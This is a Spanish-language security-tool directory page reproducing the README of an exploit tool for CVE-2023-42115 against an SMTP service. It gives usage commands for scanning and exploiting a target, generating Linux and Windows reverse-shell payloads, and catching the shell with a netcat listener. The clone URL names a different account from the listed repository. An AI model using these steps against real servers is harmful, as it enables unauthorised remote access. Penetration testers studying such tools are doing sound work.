Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2023-42115 — Generador de exploits y payloads de reverse shell basado en Python para CVE-2023-42115, con modos de escaneo y explotación, además de creación de payloads multiplataforma. | Kitploit
Herramientas/GitHubGitHub/kirinse/cve-2023-42115
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónDesarrollo de Payloads
GitHubkirinse/cve-2023-42115

cve-2023-42115

Generador de exploits y payloads de reverse shell basado en Python para CVE-2023-42115, con modos de escaneo y explotación, además de creación de payloads multiplataforma.

Ver Repositorio
948hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-42115: Scripts de Exploit y Generador de Payload

Este repositorio contiene dos scripts de Python:

  1. exploit.py: Un script para explotar CVE-2023-42115.
  2. generate_payload.py: Un script para generar payloads de reverse shell.

Requisitos previos

Antes de ejecutar los scripts, asegúrate de tener Python 3 instalado en tu sistema.

Instalación

  1. Clonar el repositorio:
    root@kitploit:~
    git clone https://github.com/isotaka134/cve-2023-42115.git
    cd cve-2023-42115
    
    
  2. Instalar dependencias:

Instala las bibliotecas de Python necesarias usando pip. Ejecuta el siguiente comando para instalar todas las dependencias necesarias listadas en requirements.txt:

root@kitploit:~
pip install -r requirements.txt

Uso

exploit.py

Este script explota la vulnerabilidad CVE-2023-42115.

root@kitploit:~
python exploit.py -t <target_ip> -p <target_port> [options]

Opciones:

-t: La dirección IP del objetivo.

-p: El puerto del servicio objetivo.

Ejemplo:

  1. Escanear objetivo
    root@kitploit:~
    python exploit.py -t 192.168.1.10 -p 25  --mode SCAN
    
  2. Explotar la vulnerabilidad
    root@kitploit:~
    python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
    

generate_payload.py

Este script genera un payload de reverse shell basado en la entrada del usuario.

root@kitploit:~
 python generate_payload.py

Pasos:

El script te solicitará la siguiente información:

A. Tipo de payload (linux o windows)

B. IP local: dirección para la conexión inversa

C. Puerto local: para la conexión inversa ** I: Si estás detrás de un router o usas NAT, asegúrate de configurar la redirección de puertos correcta hacia tu dispositivo que ejecuta Netcat.**

D. Nombre del archivo de salida (por ejemplo, payload.sh para Linux o payload.ps1 para Windows)

Ejemplo:

root@kitploit:~
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux 
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh

Configurar un Listener

Debes configurar un listener en tu máquina local para capturar la reverse shell. Puedes usar Netcat (nc) para esto.

  1. Para Linux: Abre una terminal e inicia un listener de Netcat:
root@kitploit:~
  nc -lvnp <YOUR_LOCAL_PORT>
  1. Para Windows: Abre un Símbolo del sistema e inicia un listener de Netcat:
root@kitploit:~
  nc -lvnp <YOUR_LOCAL_PORT>

Siguiendo estos pasos, deberías poder crear y usar un payload para explotar CVE-2023-42115 y recibir una conexión de reverse shell.

Contribuciones

Si tienes sugerencias de mejoras o quieres contribuir, abre un issue o envía un pull request.

Aviso legal

  1. Descargo legal: Este script está destinado a fines educativos y pruebas éticas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito de prueba es ilegal y castigado por la ley.
  2. Uso ético: Usa este script de manera responsable y solo en entornos donde puedas realizar pruebas de seguridad.

Solución de problemas

  1. Problemas de conexión: Verifica que el objetivo sea accesible y que el servicio SMTP esté en ejecución.
  2. Detección de vulnerabilidades: Asegúrate de que el banner del servicio coincida con la salida esperada para la comprobación de vulnerabilidad.
  3. Ejecución del payload: Asegúrate de que el archivo de payload esté correctamente formateado y sea accesible.

Contacto

Para preguntas o soporte, contacta con

root@kitploit:~
 [email protected]
Descargar herramienta